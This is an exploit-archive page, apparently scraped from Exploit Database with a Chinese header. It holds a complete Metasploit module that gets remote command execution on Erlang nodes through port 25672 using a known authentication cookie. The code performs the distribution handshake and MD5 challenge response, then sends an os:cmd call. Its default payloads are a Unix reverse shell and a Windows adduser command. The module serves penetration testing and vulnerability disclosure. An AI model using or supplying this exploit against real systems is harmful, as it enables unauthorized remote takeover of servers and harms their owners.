Erlang – Port Mapper Daemon Cookie Remote Code Execution (Metasploit)

• Exploit Database
• 117 阅读

• 作者： Metasploit
  日期： 2018-12-20
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46024/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking   include Msf::Exploit::Remote::Tcp   def initialize(info = {}) super( update_info( info, &apos;Name&apos; => &apos;Erlang Port Mapper Daemon Cookie RCE&apos;, &apos;Description&apos;=> %q{ The erlang port mapper daemon is used to coordinate distributed erlang instances. Should an attacker get the authentication cookie RCE is trivial. Usually, this cookie is named ".erlang.cookie" and varies on location. }, &apos;Author&apos; => [ &apos;Daniel Mende&apos;,# blog post article &apos;Milton Valencia (wetw0rk)&apos;, # metasploit module ], &apos;References&apos; => [ [&apos;URL&apos;, &apos;https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/&apos;] ], &apos;License&apos;=> MSF_LICENSE, &apos;Platform&apos; => [&apos;unix&apos;, &apos;win&apos;], &apos;Arch&apos; => ARCH_CMD, &apos;Privileged&apos; => &apos;false&apos;, &apos;Targets&apos;=> [ [ &apos;Unix&apos;, &apos;Platform&apos; => &apos;unix&apos;, &apos;Arch&apos; => ARCH_CMD, &apos;DefaultOptions&apos; => {&apos;PAYLOAD&apos; => &apos;cmd/unix/reverse&apos;}, ], [ &apos;Windows&apos;, &apos;Platform&apos; => &apos;win&apos;, &apos;Arch&apos; => ARCH_CMD, &apos;DefaultOptions&apos; => {&apos;PAYLOAD&apos; => &apos;cmd/windows/adduser&apos;}, ] ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => &apos;Nov 20, 2009&apos;, # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history) ) )   register_options( [ OptString.new(&apos;COOKIE&apos;, [ true, &apos;Erlang cookie to login with&apos;]), Opt::RPORT(25672) ]) end   def generate_challenge_digest(challenge) challenge = challenge.unpack(&apos;H*&apos;)[0].to_i(16).to_s   hash = Digest::MD5.new hash.update(datastore[&apos;COOKIE&apos;]) hash.update(challenge)   vprint_status("MD5 digest generated: #{hash.hexdigest}") return [hash.hexdigest].pack(&apos;H*&apos;) end   def exploit connect   our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"   # SEND_NAME: send initial identification of who "we" are send_name ="\x00" # Length: 0x0000 send_name << [(our_node.length+7).to_s(16)].pack(&apos;H*&apos;)# send_name << "\x6e" # Tag: n send_name << "\x00\x05" # Version: R6 (5) send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) send_name << "#{our_node}"# <generated>@<generated>   # SEND_CHALLENGE_REPLY: return generated digest and its own challenge send_challenge_reply ="\x00\x15"# Length: 21 send_challenge_reply << "\x72"# Tag: r   # SEND: send the message to the node send ="\x00\x00\x00"# Length:0x00000000 send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack(&apos;H*&apos;) # send << "\x70"# send << "\x83"# VERSION_MAGIC send << "\x68"# SMALL_TUPLE_EXT (104) send << "\x04"# Arity: 4 send << "\x61"# SMALL_INTEGER_EXT send << "\x06"# Int: 6 send << "\x67"# PID_EXT (103) send << "\x64\x00"# Node: send << [(our_node.length).to_s(16)].pack(&apos;H*&apos;) # Length: strlen(Node) send << "#{our_node}" # Node send << "\x00\x00\x00\x03"# ID send << "\x00\x00\x00\x00"# Serial send << "\x00"# Creation send << "\x64"# InternalSegmentIndex send << "\x00\x00"# Len: 0x0000 send << "\x64"# InternalSegmentIndex send << "\x00\x03"# Length: 3 send << "rex" # AtomText: rex send << "\x83\x68\x02\x67\x64\x00"# send << [(our_node.length).to_s(16)].pack(&apos;H*&apos;) # Length: strlen(Node) send << "#{our_node}" # Node send << "\x00\x00\x00\x03"# ID send << "\x00\x00\x00\x00"# Serial send << "\x00"# Creation send << "\x68"# SMALL_TUPLE_EXT (104) send << "\x05"# Arity: 5 send << "\x64"# InternalSegmentIndex send << "\x00\x04"# Length: 4 send << "call"# AtomText: call send << "\x64"# InternalSegmentIndex send << "\x00\x02"# Length: 2 send << "os"# AtomText: os send << "\x64"# InternalSegmentIndex send << "\x00\x03"# Length: 3 send << "cmd" # AtomText: cmd send << "\x6c"# LIST_EXT send << "\x00\x00\x00\x01"# Length: 1 send << "\x6b"# Elements: k send << "\x00"# Tail send << [(payload.raw.length).to_s(16)].pack(&apos;H*&apos;)# strlen(Command) send << payload.raw # Command send << "\x6a"# NIL_EXT send << "\x64"# InternalSegmentIndex send << "\x00\x04"# Length: 4 send << "user"# AtomText: user   sock.put(send_name)   # recieve servers "SEND_CHALLENGE" token (4 bytes) print_status("Receiving server challenge") challenge = sock.get challenge = challenge[14,4]   send_challenge_reply << challenge send_challenge_reply << generate_challenge_digest(challenge)   print_status("Sending challenge reply") sock.put(send_challenge_reply)   if sock.get.length < 1 fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore[&apos;COOKIE&apos;]}") end   print_good("Authentication successful, sending payload") sock.put(send) end end